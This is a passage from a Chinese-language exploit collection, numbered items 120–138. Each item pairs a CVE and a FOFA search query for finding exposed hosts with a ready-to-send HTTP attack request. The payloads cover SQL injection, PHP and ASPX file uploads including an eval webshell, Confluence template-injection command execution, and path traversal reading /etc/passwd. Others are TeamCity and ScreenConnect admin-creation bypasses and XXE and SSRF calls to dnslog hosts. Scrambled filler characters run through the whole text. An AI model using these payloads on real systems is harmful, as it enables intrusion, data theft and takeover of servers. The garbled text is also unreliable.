# g1 t% g+ r8 _8 t- Q$ cHost: x.x.x.x( P: @# K* e5 }
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee, b' V# q- y$ O4 E8 O, L4 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
5 `. _( l4 O* l" S- O& vAccept: */*- h* m) {+ u# L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 r. p# L; s! [% J( }  u
Accept-Encoding: gzip, deflate
8 S+ G1 B% t3 r  g8 uContent-Type: application/x-www-form-urlencoded;2 o2 G1 d3 t& Z; C; C. _
Content-Length: 109* {7 j8 m7 p6 |; l8 f" \9 ^# q
Origin: https://58.18.133.60:8443" p- J  z, L8 r% L) D. n; x, V4 M
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php! T. z. ^* ~4 X( C; O& N
Sec-Fetch-Dest: empty
3 F" ~: O0 }, K6 o! \7 iSec-Fetch-Mode: cors. N6 O$ O% J9 ]
Sec-Fetch-Site: same-origin5 ]0 j. s  _7 g0 O
X-Forwarded-For: 1.1.1.1% V, n3 ^" [) V# i
X-Originating-Ip: 1.1.1.1# k, O# w& o1 N7 V, }& t8 N4 C
X-Remote-Ip: 1.1.1.1  R6 v* z( f: E3 E( D
X-Remote-Addr: 1.1.1.19 K# D1 j& g+ M8 A% \8 Q" b  N# d
Te: trailers
: f+ E1 P5 i3 ^+ c( yConnection: close" O4 e' s3 n( a1 _' O
; o" N& A' i0 {/ `$ X3 z* Q
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
. H- B2 T+ z3 J: P/ g& x% i
- @7 [: A# a! Q% G& u6 C) U+ ~1 L( ~
6 D3 g4 f" ^4 I. u% B120. 北京百绰智能S40管理平台导入web.php任意文件上传/ l3 P0 }' z" H: z! ~) ?2 _1 P( Y
CVE-2024-1253- t- |# m; m" G
FOFA:title="Smart管理平台"7 _9 A  c# w1 z% k: \' \9 u$ k  A6 }
POST /useratte/web.php? HTTP/1.13 L$ x3 z, N/ \+ j3 U
Host: ip:port( m2 U. @  l0 ?, ?# i8 l
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
8 g3 j, ?7 @5 p9 ?8 Z, cUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
: G2 X4 f* {7 J% S0 ^9 E, J' V! ^. g5 xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! H3 n' P# v* {: e  y* v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- ]; p4 Y% t: Y9 I1 \9 G/ t- VAccept-Encoding: gzip, deflate
4 J; O- V5 a( o  w' t1 ]: tContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328" ^4 L0 l& B* u0 _2 b
Content-Length: 597
5 u+ F' a0 v/ x8 g* dOrigin: https://ip:port
/ R" g& n6 k: ?6 E3 U; f; mReferer: https://ip:port/sysmanage/licence.php
" Y6 k7 `; z/ t& OUpgrade-Insecure-Requests: 11 n  Y# I& F+ i: O" O3 I
Sec-Fetch-Dest: document9 D6 ?( h0 l2 `) W, k$ I
Sec-Fetch-Mode: navigate
7 O+ d8 Q( n, ~1 |  K' rSec-Fetch-Site: same-origin; Q6 U3 H+ K/ U
Sec-Fetch-User: ?1- X; K  e0 R  N, D
Te: trailers
3 m2 v* s0 V& W2 `* d4 }Connection: close
& `% k# u& {6 P! @8 Y& Z) N# }$ s* |
-----------------------------42328904123665875270630079328
7 b0 A# U! _$ d/ uContent-Disposition: form-data; name="file_upload"; filename="2.php": }; Q3 F3 `7 X1 T- w& a
Content-Type: application/octet-stream+ i' H5 M6 t0 K

& j1 a) w' R+ v6 t) y' P5 j+ g<?php phpinfo()?>
( R. n) G: _% Z6 l& S-----------------------------42328904123665875270630079328
" ~1 ^* R0 {* E" T4 FContent-Disposition: form-data; name="id_type"" b' |) _) y# m5 s+ H3 d8 i

4 R; e/ p, w% a. j" X1
# {& Y" x+ l) M( n4 j! T! A0 R-----------------------------42328904123665875270630079328  w3 i3 P- i8 O: ~7 A0 |
Content-Disposition: form-data; name="1_ck"- g  j& |2 y- g& R0 D  q
3 m7 j& w0 H% N
1_radhttp. n9 U" P) ^% M1 z
-----------------------------42328904123665875270630079328! k% x) U& b( G0 s& k
Content-Disposition: form-data; name="mode") ^% N- D% q! H4 A& _

5 C, O( B: q2 X& ?2 }- J, ?; Wimport3 V  ?* A/ o' o5 Z
-----------------------------42328904123665875270630079328( J5 r* U0 b4 H

' ~0 z+ u" s+ O6 [# K
" N  d  y3 |( t; g& D文件路径/upload/2.php2 M% ?. y! |4 z! l. P; y
  N$ B/ L- b9 k4 K0 c
121. 北京百绰智能S42管理平台userattestation.php任意文件上传" p/ l  Z0 Q' x! U
CVE-2024-19188 R5 H8 w- g4 u5 s, E5 _
FOFA:title="Smart管理平台"
3 r  Q4 ]# Q0 v$ {8 n9 VPOST /useratte/userattestation.php HTTP/1.16 I, h2 i( k- f4 q4 W
Host: 192.168.40.130:8443
2 [2 V0 I' @2 oCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
+ j1 d; [! B! ]& ^User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
9 v6 k0 I, z+ N9 h% C8 f' NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# g' }9 O3 x' q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" X; B- b, H: j
Accept-Encoding: gzip, deflate
. d! O! I' h  M$ d7 EContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328) h7 u, N/ H2 L
Content-Length: 592. T' u; k' b) G6 m8 E+ k: F6 a) K
Origin: https://192.168.40.130:8443/ Y2 q  q! r" v  P% N" ?# d
Upgrade-Insecure-Requests: 1
4 n, }) Z$ T" s" XSec-Fetch-Dest: document
5 K" c& U, x9 ]! ISec-Fetch-Mode: navigate; ^% ~4 y% Z" S2 f
Sec-Fetch-Site: same-origin$ D- P' i9 }& |1 m
Sec-Fetch-User: ?1
/ r6 a' l- E1 B# L) o! c* f. DTe: trailers& W( {! O, |9 g& u' y( _
Connection: close9 J" v1 |, k+ j: T  w6 J
5 i# g* W6 G* X* L2 f& z! B$ v
-----------------------------42328904123665875270630079328
: s9 g  r6 j" X. c+ sContent-Disposition: form-data; name="web_img"; filename="1.php"
( K$ q/ c. ^9 e2 a; P2 c, u: kContent-Type: application/octet-stream5 j8 R1 r' c4 X' s* y: K" E
) L" C% D! \- l7 j0 z, P
<?php phpinfo();?>
) N, \2 R" W$ L& H+ Q4 F2 y. S( x-----------------------------42328904123665875270630079328
9 T+ G, a$ `; l# V0 y/ yContent-Disposition: form-data; name="id_type"6 R0 u; \! b; ^, }5 N# @
1 W( ?# z+ p/ ?0 }# D
18 ]2 a! U" ?6 s% q
-----------------------------423289041236658752706300793284 v5 b, c% Q  M* x3 W$ T5 H6 t
Content-Disposition: form-data; name="1_ck"& v4 e1 q: f. z! q: g% E% ~% \
' v8 U* f2 S* y& b: \
1_radhttp- ?; J& U# C% u! y' A% T& \
-----------------------------42328904123665875270630079328& N  F2 R8 b4 i1 |
Content-Disposition: form-data; name="hidwel"
$ p' s% ?% q) g7 [) y" ^
7 B7 F7 C7 l& U! }set4 ?& E# A) k$ O% s7 M1 a, I) ]' B% n
-----------------------------42328904123665875270630079328
6 X( j! n: e& ~$ A* r9 C+ _6 o$ d
/ k  R: M0 C# ]1 B' ^! g. p+ Q4 h1 _/ l8 s- E! J" k
boot/web/upload/weblogo/1.php: ^* i8 e. q2 V# O
) W0 t* L7 w! Y2 a0 H
122. 北京百绰智能s200管理平台/importexport.php sql注入
5 b" D, @- H6 OCVE-2024-27718FOFA:title="Smart管理平台"& ?! X) M& @2 @$ x) l$ g9 o
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()2 |0 ~- K5 X% Y
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
3 m% P+ p4 q0 SHost: x.x.x.x' H* E! g5 \3 k' f/ e
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
  |" S7 r9 X8 R% x4 a! dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
9 l- \. |6 z3 \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 _3 w2 W1 O9 c7 _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% q$ Q2 v  i3 x- hAccept-Encoding: gzip, deflate, br
: n% A+ A% L1 E- Q( {Upgrade-Insecure-Requests: 1
2 Q* E1 Z* x3 m' [7 l( [9 uSec-Fetch-Dest: document' x" r) B% J( j* v; u" s$ O0 N1 {
Sec-Fetch-Mode: navigate2 ]+ P  o( ~3 V" B' U
Sec-Fetch-Site: none
4 }! A2 ~0 |! J; s1 l: R# a8 OSec-Fetch-User: ?16 E* z. Z8 e) a0 O0 ?+ F, b
Te: trailers
) R4 R, \8 \2 z  c& J& {8 ]Connection: close
( y' K/ z5 k  x# Q) ?6 O" Y" c3 G5 L; s) l. |

5 F$ o' {# Y2 h+ E; z123. Atlassian Confluence 模板注入代码执行9 ?% S4 z1 M1 L. P3 p6 {
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"! A$ Z- J2 n$ Y9 P1 D9 u; _3 D. W
POST /template/aui/text-inline.vm HTTP/1.1& N; ^% k6 @- J. W4 \- G' I2 b
Host: localhost:8090$ G. n, n/ P8 X! U& I
Accept-Encoding: gzip, deflate, br
3 T. m* u6 s  fAccept: */*3 h& h: ?/ e% O/ K: |
Accept-Language: en-US;q=0.9,en;q=0.8
$ L  R( q! s2 [8 C" h! w2 U8 I2 {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
1 p) X0 c- P. C( D! S# V) k+ xConnection: close
' R5 |! H8 n6 ?! y% e' |Content-Type: application/x-www-form-urlencoded
8 c2 w9 i  r' H( f
* ]: v. s8 @, b  ]label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
& w7 q7 q0 l2 ~! Q2 Y
9 _& n* n1 [- p& r) h, d4 M
5 U9 x* g4 X6 L0 O5 O9 F124. 湖南建研工程质量检测系统任意文件上传( j: p1 v! Y/ b) N$ N* e: R
FOFA:body="/Content/Theme/Standard/webSite/login.css"
# o! H$ k! J" ?* j2 X; W( KPOST /Scripts/admintool?type=updatefile HTTP/1.1
9 d6 E; E3 P' o8 H' V* T% \8 `! ?Host: 192.168.40.130:8282
: G8 s3 T* K  J3 dUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
) M  n5 c# v& M; gContent-Length: 72
  g2 r& ^6 L. ?" C4 n. iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
0 [' U8 P7 p2 y" TAccept-Encoding: gzip, deflate, br2 L$ ]' ~! K& @. c# J0 Q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& w; u0 G4 `5 L; {& g& h2 _- J) GConnection: close4 }* S! w  k" H% \; V
Content-Type: application/x-www-form-urlencoded$ w3 e( [/ P/ w

8 D. `% x( w, V1 l/ U  sfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>" M$ q. `: R7 O
; j- r" {4 X5 F) l! R
9 y8 Z2 |# H* [; p
http://192.168.40.130:8282/Scripts/abcgcg.aspx
0 _$ u+ v+ Y5 ^7 g' L: v$ N% ?( E# M1 g3 @4 w: t1 ^& t' _, o* p
125. ConnectWise ScreenConnect身份验证绕过
3 P" q4 |2 g7 ^# m; F- k/ ^+ A0 yCVE-2024-1709
* X, D* h( [- j- ?. {8 z- u, wFOFA:icon_hash="-82958153"1 [( L6 S, z8 v- P$ b& Y1 J$ Z9 q$ O
https://github.com/watchtowrlabs ... bypass-add-user-poc# v' p. {9 S7 U) @2 T+ |, T
( V) q; f1 K. }) |' W% l

7 V' y7 n* O* H使用方法
+ J8 {# h& d' o4 Epython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!6 Y) p3 [8 w. Q. [

4 a! ]2 Z& O& P. u
; Y) P* p) a6 a  L4 c创建好用户后直接登录后台,可以执行系统命令。* W- w" h/ Y  A
( m; ]) l5 F& |' A  p0 P0 \& f
126. Aiohttp 路径遍历; s$ ?: a4 \$ Z
FOFA:title=="ComfyUI"
8 {+ O4 f9 t- p/ ^, w, B- _GET /static/../../../../../etc/passwd HTTP/1.10 x9 R7 Q. H  D- O
Host: x.x.x.x6 d4 X2 c2 V: [/ I& x6 n: L# M- ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36: r5 r4 S3 e6 }5 R
Connection: close4 d- o, l6 B  X" x/ Z' A! G
Accept: */*7 _2 n, n" c. X* {) {
Accept-Language: en
8 [# w8 d7 B) w) B7 LAccept-Encoding: gzip- |4 S  l+ t; |7 s/ z+ h6 F
$ B. d/ u+ }8 I. n
; z+ C- g$ ?( O3 ?, Z, S
127. 广联达Linkworks DataExchange.ashx XXE2 `  l* O4 a5 j1 \. E: {% E1 b9 `- V
FOFA:body="Services/Identification/login.ashx" ) D* {5 z4 K0 H1 Z' W
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
2 a3 E, @  L. ?8 |1 cHost: 192.168.40.130:8888" O, z1 \% v$ q' ?5 ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
% z3 X, H$ V% A1 q: b, hContent-Length: 415! ], j# t4 p: c- B  O4 U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. H3 O7 F0 M1 A' v# G- u1 l
Accept-Encoding: gzip, deflate6 F. Y0 X# l8 O0 }# m
Accept-Language: zh-CN,zh;q=0.9
, f5 V8 ?5 k; J0 Z5 ]: vConnection: close
9 H3 i8 W% `- f) w. j& l+ z! RContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
5 w' j* I2 u+ L& t" U+ zPurpose: prefetch
0 |0 z2 w& s' C% q! KSec-Purpose: prefetch;prerender
7 A5 L; _/ g. F2 R4 Y+ i/ N) g' s; F! I: x. n
------WebKitFormBoundaryJGgV5l5ta05yAIe0; M. h# v/ F3 l: L
Content-Disposition: form-data;name="SystemName"/ Q% M. J7 w  H6 z  O8 ~0 C

* C) ^# J/ K% L* {. l8 sBIM, D4 ?* r/ I7 Z+ Z# F
------WebKitFormBoundaryJGgV5l5ta05yAIe0% u5 T* ?# k. p; {; k7 T$ q5 }
Content-Disposition: form-data;name="Params"
2 |2 z+ K2 K! }Content-Type: text/plain
+ J1 D4 i4 U* C& \: O; t' k/ o% y) G8 U( z8 D
<?xml version="1.0" encoding="UTF-8"?>; \9 A4 l5 b  J1 r( y  }, U
<!DOCTYPE test [
% G3 w. b6 E. F. A<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
9 a7 C) H9 }" q' s]* K6 w- ~5 t# S
>7 u; }: S8 i" C" r$ U) a! a
<test>&t;</test>
, V3 `7 e! W% g: R/ J------WebKitFormBoundaryJGgV5l5ta05yAIe0--
% N* l7 _8 N2 u& K8 s1 F- A3 v2 W+ K
+ R* L. C9 o: Z" c1 z

7 k3 F$ K4 }! k' F$ a  |128. Adobe ColdFusion 反序列化9 t) G; l" r0 t2 x) _7 J$ W1 l( w
CVE-2023-38203* Z7 U1 }$ j6 z
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本); _, O4 g4 h3 `" W  L; l7 V* S5 e
FOFA:app="Adobe-ColdFusion"- ^3 `1 I6 A0 a# Q
PAYLOAD8 B1 j3 g) ?, z9 s* }3 X/ P. Q5 o
' p! l6 i' T& I1 o
129. Adobe ColdFusion 任意文件读取8 r4 \  _  f, F# D# c# G
CVE-2024-20767
& n: V5 f% d! bFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
! V4 w( M* [- m! p% G  R6 @第一步,获取uuid
0 n/ M5 M1 k' i1 x2 j* wGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1! Z2 C) _# M* u4 G$ X3 J
Host: x.x.x.x
+ R8 J* z* r, {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
8 B/ {% @2 D0 G) u" _9 k! p$ LAccept: */*  @  j1 |9 E, g9 g4 G
Accept-Encoding: gzip, deflate
/ c7 Z% o3 l" V. V, bConnection: close
7 ]0 f! v% E* P9 U( F" T' }6 \) X/ q' r
2 G+ z6 {5 |6 W$ [, ~- [# U
第二步,读取/etc/passwd文件  @4 l: k9 K" Y* |
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
; u4 w* ~- V/ O& l0 u: L; `Host: x.x.x.x  G- V& i6 M) p! U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36' B( q7 k. }1 n! d* L$ P4 C. h2 J
Accept: */*
: S0 y1 \& D% b, x( E1 QAccept-Encoding: gzip, deflate
/ W* F# t1 n, q8 g0 N8 A: I% QConnection: close
7 D. b& n" b1 m! U6 \. xuuid: 85f60018-a654-4410-a783-f81cbd5000b9
) C# k" d3 u9 [, v
1 ~3 ^5 _" l$ i/ G
, K. }9 R3 ~8 X' s% v/ T130. Laykefu客服系统任意文件上传0 P7 e% o; T  S  ?6 y/ N( \
FOFA:icon_hash="-334624619"; n$ C$ r8 O( f# {, o2 \( w1 j* }
POST /admin/users/upavatar.html HTTP/1.1* Y  R. [: e$ L& k' y8 l3 i. O+ g  F
Host: 127.0.0.18 d; }* r. C  y7 w, u
Accept: application/json, text/javascript, */*; q=0.01% W/ k( ?  \) V
X-Requested-With: XMLHttpRequest2 M* I1 Z4 T8 p( P$ P% O8 Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26$ Y, k) u! ], ?. J6 t; ~& l
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
! A9 t4 }  E, q! |1 z' vAccept-Encoding: gzip, deflate
, l% B; B' \# L7 j2 G" p2 K. rAccept-Language: zh-CN,zh;q=0.9
2 q6 P- \2 y) K* A9 WCookie: user_name=1; user_id=3- F" T; e# C& z& x9 R
Connection: close
1 J0 T8 u5 }" B/ D9 c8 _( R  X4 p( |" E
------WebKitFormBoundary3OCVBiwBVsNuB2kR
+ c" M2 E3 t( \Content-Disposition: form-data; name="file"; filename="1.php"; Y0 ~$ f3 E* R: E
Content-Type: image/png
4 c8 G( n# I  Z) U . A' Y. {( J3 m9 ?  L0 K6 X
<?php phpinfo();@eval($_POST['sec']);?>
2 c9 d% ]+ B+ U: ~7 a------WebKitFormBoundary3OCVBiwBVsNuB2kR--
( L( Z& o0 J/ y: @) m! O6 s, e$ p; C
7 D' z8 _+ X) d3 X; d2 E9 x9 b
131. Mini-Tmall <=20231017 SQL注入
; n$ ?  \- T1 t3 m* C: fFOFA:icon_hash="-2087517259"- Y6 }9 F/ _  K7 p% g
后台地址:http://localhost:8080/tmall/admin1 Q  ]' H' J: G
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)% P  ?7 ]: B8 J- Y( P1 e3 T# ]" T
) Q" b3 E2 r0 H8 D
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过( f# d& l& k# y5 f7 l$ Y9 E
CVE-2024-271989 Y8 a6 U7 e1 K( r# c9 E2 Y5 |
FOFA:body="Log in to TeamCity"
2 _, J/ G: y7 X1 O" U9 ePOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1( c% _, v. ^) q. C
Host: 192.168.40.130:8111) V1 t! Y. U+ y) W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.367 \& W( ~+ C1 Z* x0 F
Accept: */*5 a/ _% N" {+ O# y3 f
Content-Type: application/json
' ~9 U4 ]0 A/ ]: B3 E1 vAccept-Encoding: gzip, deflate
9 a" _. }. Z) L2 c0 o
$ d/ o1 J! l& d) H3 L% i" j{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}! w2 ~/ D0 l$ f" P! v' q1 A7 h
1 k3 ~* V; n: {+ T4 b7 G  |4 |
* M2 t; o# t8 E! |& Y+ v6 d
CVE-2024-27199
) T' a: i7 a, L: c+ G+ D/res/../admin/diagnostic.jsp' k( n- T, T2 U
/.well-known/acme-challenge/../../admin/diagnostic.jsp% C" s$ A& b% d0 }0 J
/update/../admin/diagnostic.jsp, }9 \) }# N1 l

3 _, a# @; X! L, r( p; w; ]! w! B
CVE-2024-27198-RCE.py/ H: O  E5 x% I/ T" z; d$ `
! t  Y- D, i/ J: i
133. H5 云商城 file.php 文件上传9 [5 d% D4 K9 V
FOFA:body="/public/qbsp.php"
3 |( i( b* d5 m4 Z/ s$ S& APOST /admin/commodtiy/file.php?upload=1 HTTP/1.1
8 g) G, p3 B* B' L+ O! ~; F; yHost: your-ip; X( l" n, ]( a) x7 S( I* t- t
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
' j7 c( ]' T+ b& `0 r8 uContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx3 V0 `4 }4 p+ A5 I( i" C# u
2 Y' `. K, _1 _" F/ i/ m
------WebKitFormBoundaryFQqYtrIWb8iBxUCx0 M% U7 |" c, s( j2 r( x
Content-Disposition: form-data; name="file"; filename="rce.php"
% s0 }( o6 P5 ^1 z/ S& }, LContent-Type: application/octet-stream
. p, [, n3 ~. p8 `4 ~' p7 X ; I: V& m# g7 Z
<?php system("cat /etc/passwd");unlink(__FILE__);?>
2 E2 T1 |$ d) w2 W* }------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
2 M7 x6 X  Q8 D) x) y- q, o# Z+ g
! H5 ^! E$ O6 e# D4 e% M" p6 p& v* q  \  Z
, l2 I2 B$ U* s' R: b& e8 p
134. 网康NS-ASG应用安全网关index.php sql注入8 W" b! ?4 x7 V$ ^2 f
CVE-2024-2330' h& {. R5 w' o$ ~9 D  \9 W
Netentsec NS-ASG Application Security Gateway 6.3版本
0 z6 @* X4 v, e& |% l: \FOFA:app="网康科技-NS-ASG安全网关"
( k% U  u5 L# fPOST /protocol/index.php HTTP/1.1
2 r3 F5 i; U4 G0 RHost: x.x.x.x3 Y* j" S$ Y  j9 j! A; l
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
. S" U' u0 s. M& }' W, J# R+ D3 BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.03 U0 _" g$ [. @) \2 D
Accept: */*
( _  T$ m; x7 u  a( p% n, C1 T9 X+ sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ ^' g: R2 X; b' w5 T5 g$ K
Accept-Encoding: gzip, deflate
0 H1 o; d1 i" b" G3 KSec-Fetch-Dest: empty
5 \* `! X& r+ ISec-Fetch-Mode: cors
. l. x6 J9 Z  y* S1 qSec-Fetch-Site: same-origin
* ^4 h) ^: C; K* f5 fTe: trailers
( s& l+ _  U2 ^' L8 ^Connection: close
( L9 C! C( }: Z$ IContent-Type: application/x-www-form-urlencoded
. o7 J. q6 m3 E: z' iContent-Length: 263
$ e, ^* q5 C* s$ m! `/ M  U: R$ t3 k( [0 o. d
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}- J% j" V9 P! T! |# Z5 _
0 |5 m5 @+ P, d  n! @& L3 \

. K3 s' Y/ }8 }/ }; X! x135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入. p" N. a$ @% J
CVE-2024-2022
( a) s) ]/ g7 v& c5 DNetentsec NS-ASG Application Security Gateway 6.3版本
7 D3 [: {) m) S, p# dFOFA:app="网康科技-NS-ASG安全网关", ], X! m* Y$ J4 _
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
5 Z8 k5 _  Z4 F" QHost: x.x.x.x
& T& Z8 a' `3 V: W6 r0 O. _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
& k1 G4 [% k- ]  j, p; pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; t5 ]) G; K. x+ e% zAccept-Encoding: gzip, deflate
5 h+ h2 f! P4 J* k/ l8 T2 Q6 `" F7 m! `! HAccept-Language: zh-CN,zh;q=0.9- b: k) N! W5 [4 T/ D
Connection: close7 W6 Q0 @  {1 \: s

  M3 x: o! k3 }/ A# E. I( u+ u0 v; y( y, O
136. NextChat cors SSRF9 m6 b0 `8 A6 g: P; s: [' m5 m; S& b
CVE-2023-49785' ?" m9 B3 ~! f+ R+ U
FOFA:title="NextChat"
( f8 E; O9 [: i8 y5 FGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.13 r* F+ p4 u1 ]' E& y! G" \7 o
Host: x.x.x.x:10000
( _1 V2 {, k6 r7 NUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
$ ?1 V* [0 X8 a! b7 L* b$ V" xConnection: close
9 j4 I  P8 {# H6 Q; sAccept: */*/ R& `- N7 X) x/ r
Accept-Language: en7 @* K* q! d/ @. ?' ]
Accept-Encoding: gzip
) z4 O% [3 R3 ~* ~0 E- H/ w6 N: z$ z

% r0 n9 l- |2 r; F0 T137. 福建科立迅通信指挥调度平台down_file.php sql注入
  J7 r5 X- O- M$ nCVE-2024-2620
" z/ @* e& p! `" S' uFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
1 u% t9 U) R4 h; [! o: [" ]$ cGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1/ A5 Y4 b9 }- ]7 ]# W& p
Host: x.x.x.x
, U9 i. l; c8 HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.06 |' G/ v$ v" R- b2 |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" J& R# F+ i6 g# F+ U8 l  J1 ]Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, X1 Y$ ?2 l' HAccept-Encoding: gzip, deflate, br# O" y! `- j2 ?! T) P* ?' \9 d; S$ R
Connection: close
& C% w6 ?+ \, Z$ KCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj, @& e- e, V- E6 N& I
Upgrade-Insecure-Requests: 1- D3 L( B$ X. E
: G* ~" ^& O* x/ P

- P; T' L' M: g138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
7 W4 B# o/ I, t+ U' z, j+ L: u& e- YCVE-2024-2621
! h% M+ m1 b" \0 _0 h, }7 RFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
